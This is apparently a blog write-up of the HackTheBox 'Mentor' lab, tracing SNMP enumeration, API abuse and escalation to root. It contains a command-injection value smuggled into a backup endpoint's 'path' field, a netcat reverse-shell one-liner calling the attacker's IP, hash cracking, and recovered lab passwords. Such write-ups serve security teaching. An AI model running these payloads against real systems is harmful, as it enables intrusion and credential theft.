search
Buy me a tea

Hackthebox - Mentor

Hacktebox mentor

hashtag
Nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.11.193                   
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 10:50 EST
Nmap scan report for 10.10.11.193
Host is up (0.028s latency).
Not shown: 65527 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)
|_  256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)
80/tcp   open     http       Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://mentorquotes.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/25%OT=22%CT=1%CU=38011%PV=Y%DS=2%DC=I%G=Y%TM=63A874
OS:B2%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST
OS:11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 896.09 seconds

  • We need to change /etc/hosts file and add this 10.10.11.193 mentorquotes.htb

hashtag
UDP

I was kinda stuck on emumeration (I had check port 80 but did not think of subdomain enum right away) at first so I did an udp port scan with nmap sudo nmap -T4 -sU 10.10.11.193 and got interesting results.

Note this taught me that it is always worth to do an udp scan as well.

  • Nmap result

hashtag
SNMP

hashtag
Enumeration

  • hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt mentorquotes.htb snmp hydra

hashtag
snmp-mibs-downloader

  • sudo apt install snmp-mibs-downloader

  • sudo download-mibs

  • sudo vi /etc/snmp/snmp.conf we comment the line "mibs:"

hashtag
snmp-check

hashtag
HTTP

  • We land on this page when visiting http://mentorquotes.htb/

landing

  • Gobuster does not give anything interesting

  • Here is the http response header with some infos

hashtag
API

  • Let's try subdomain with wfuzz wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://mentorquotes.htb/' -H "HOST: FUZZ.mentorquotes.htb"

  • Here we get mainly 302 except for the api which gives us a 404. Let's add it in /etc/hosts file 10.10.11.193 mentorquotes.htb api.mentorquotes.htb

  • We can use gobuster again to find endpoints in this new subdomain. We get interesting results on our api

  • That's very cool we get the docs of the API http://api.mentorquotes.htb/docs.

  • We also have an admin endpoint that will be worth having a look at later

  • We find a username james and their email james@mentorquotes.htb user

  • Turns out it has a signup endpoint Signup

  • I created a user

  • It seems like we might be able to enumerate users. Let's try this

  • First we need to login to get and authorization token login

  • Now let's try to see info of user 1 access denied

  • We need to be an admin. Let's see what else we can do

  • I tried to bruteforce the token with hashcat but it did not go anywhere.

  • I tried to tamper with it on jwt.io. It was useful to see how it is made but we do not have the key.

  • Also the common attacks on jwtarrow-up-right did not work.

  • Let's try to play with the signup and see if we could signup another james user. So if we try with username and email it does not work we get a message saying that the user exists already. Using this we can check if the admin user we found when enumerating smtp exists on the api. But it does not so let's keep trying to impersonate james.

  • I tried different things but nothing worked

hashtag
Back to SNMP

  • Let's try to go further with SNMP, maybe we'll have more luck.

  • We did not try all the possible tools or wordlists.

  • Let's use onesixtyone with this wordlistarrow-up-right onesixtyone -c wordlist-common-snmp-community-strings.txt 10.10.11.193

  • Nothing here.

  • Let's try it also with nmap sudo nmap -sU --script snmp-brute 10.10.11.193 --script-args snmp-brute.communitiesdb=wordlist-common-snmp-community-strings.txt

  • We do not get anything more than the public community.

  • We can use also this toolarrow-up-right. I really recommend using a pipenv to install it

    • sudo apt update we update our kali

    • sudo apt install python3-venv we instal venv

    • python3 -m venv snmpbrute we create a new venv

    • source snmpbrute/bin/activate we launch it

    • pip install scapy it requires scapy to work properly

    • python3 snmpbrute.py -t 10.10.11.193 -p 161

  • It found another community internal communities

  • Once we are done with snmpbrute we can deactivate the env by typing deactivate

  • Let's run snmpwalk, we will have to put the output in a file, because it is huge snmpwalk -c internal 10.10.11.193 -v2c > internalenum

  • Let's see whats in the file and make a search on "STRING" it seems to output interesting infos

  • We find a string that looks like a password kj23sadkj123as0-d213! Let's try it in our API to see if we get james this way. If it does not work on the API we will try it on ssh. password

  • It works, we get a token! james login

  • Let's try our juicy endpoints. It seems to work, we can list the users users

  • Apart from James we also have an svc account

  • Another interesting endpoint to check is the one that is not in the docs but that gobuster found for us /admin/. admin

  • When we try to access /admin/check it says it is not implemented yet

  • When we try to access /admin/backup it does not accept the GET method. Let's try with a post. backup

  • It needs a body and we should also change the content type header to application/json. So our request in burp repeater looks like this request

  • We have another info when we get the response. It also need a path. response

  • As it wants a path let's ask it for /etc/passwd. It seems to work but does not output the file works

  • Let's try to see if it can execute commands. This is the value that we will put in path /etc/passwd;wget http://10.10.14.5/test

  • Alse before sending the request we need to launch our python http server, this way we will see if it actually checks the file. python3 -m http.server 80

  • Here is our request request

  • It does get the file! python server

  • So now we should try to get a shell. Let's set up a listener rlwrap nc -lvp 4444

  • So I tried multiple payload from my pentips, pentestmonkeyarrow-up-right and payloadallthethingsarrow-up-right

  • The only one that worked is this one (do not forget the semi colon in the end and put sh and not bash because bash will fail) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f;

  • So we get a shell. It's root, but last time I saw this it was because I ended up in a docker container. shell

  • And an ls proves that we indeed are in a docker again docker

  • We can grab the user flag from /home/svc/user.txt

hashtag
Privilege Escalation

  • Looking around we find different interesting files.

  • The /app/app/db.py shows the database url os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

Note that here we get connection string to the db. The username and pass are postgres:postgres

hashtag
Postgresql

  • With a quick search we can find that default postreSQL port is 5432.

  • We could try our luck there.

  • We will need chiselarrow-up-right. This tool is my favorite for when I need to tunnel or pivot. It really helped me a lot when I was working on Dante prolab. If you do not like this one there are other alternatives out there like sshuttlearrow-up-right or socatarrow-up-right.

  • To install chisel on your kali curl https://i.jpillora.com/chisel! | bash

  • Then you will need to put a chisel binary in your target

  • wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz get it in your kali

  • gzip -d chisel_1.7.7_linux_amd64.gz extract it

  • python3 -m http.server 80 start your python serv

  • wget http://10.10.14.5/chisel_1.7.7_linux_amd64 get it from the target

  • chmod +x chisel_1.7.7_linux_amd64 make it executable

  • Now we need to launch a chisel server in our kali sudo chisel server --port 5555 --reverse chisel server

  • ./chisel_1.7.7_linux_amd64 client -v 10.10.14.5:5555 R:5432:172.22.0.1:5432 we forward the postgresql port to be able to access it in our kali chisel client

  • psql -h 10.10.14.5 -U "postgres" -p 5432 let's try to connect to the database. If you need a refresh on postgresql herearrow-up-right is a nice article

  • \l list the database list db

  • \c mentorquotes_db we connect to the db we want

  • select * from "users"; table users

  • Let's crack svc password in hashcat hashcat -m 0 hash /usr/share/wordlists/rockyou.txt

  • We get this password 53f22d0dfa10dce7e29cd31f4f953fd8:123meunomeeivani

  • We can now connect in ssh as svc ssh svc@10.10.11.193 which is a more convenient shell.

hashtag
linepeas

  • Let's upload linepeas in our target to enumerate wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

  • python3 -m http.server 80

  • And in our target wget http://10.10.14.5/linpeas_linux_amd64

  • chmod +x linpeas_linux_amd64

  • ./linpeas_linux_amd64

  • Linepeas finds the snmpd conf file. Let's have a look snmp

  • It contains a password! SuperSecurePassword123__ conf file

hashtag
SSH as james

  • Let's try to use it for james ssh james@10.10.11.193

  • It works!

hashtag
James' sudo rights

  • Let's first try sudo -l and if it does not work let's run linepeas again

  • We get something really interesting! James has sudo rights on /bin/sh

  • Let's try sudo /bin/sh

  • It works we have a root shell root

  • We can grab the flag

hashtag
Resources

PreviousHackthebox - LoveNextHackthebox - MetaTwo

Last updated